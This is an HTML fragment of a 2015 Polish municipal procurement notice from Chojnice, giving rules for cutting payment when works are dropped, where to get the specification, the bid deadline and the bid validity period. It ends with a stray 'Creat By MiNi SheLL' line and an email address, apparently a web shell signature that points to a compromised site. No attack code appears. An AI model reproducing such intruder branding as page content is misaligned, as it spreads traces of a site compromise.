W przypadku zaniechania części zakresu robót z przyczyn, których nie można było przewidzieć, które są niezależne od Zamawiającego, Zamawiający zastrzega sobie możliwość zmniejszenia wynagrodzenia o zaniechane czynności.  Podstawą zaniechania zakresu robót i zmniejszenia wynagrodzenia będzie protokół konieczności, sporządzony przez kierownika budowy i Inspektora Nadzoru Inwestorskiego oraz zatwierdzony przez Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.miastochojnice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Chojnicach  Stary Rynek 1 89-600 Chojnice.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.04.2015 godzina 10:00, miejsce: Urząd Miejski w Chojnicach  Stary Rynek 1 89-600 Chojnice
Biuro Podawcze - Informacja pokój 306.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com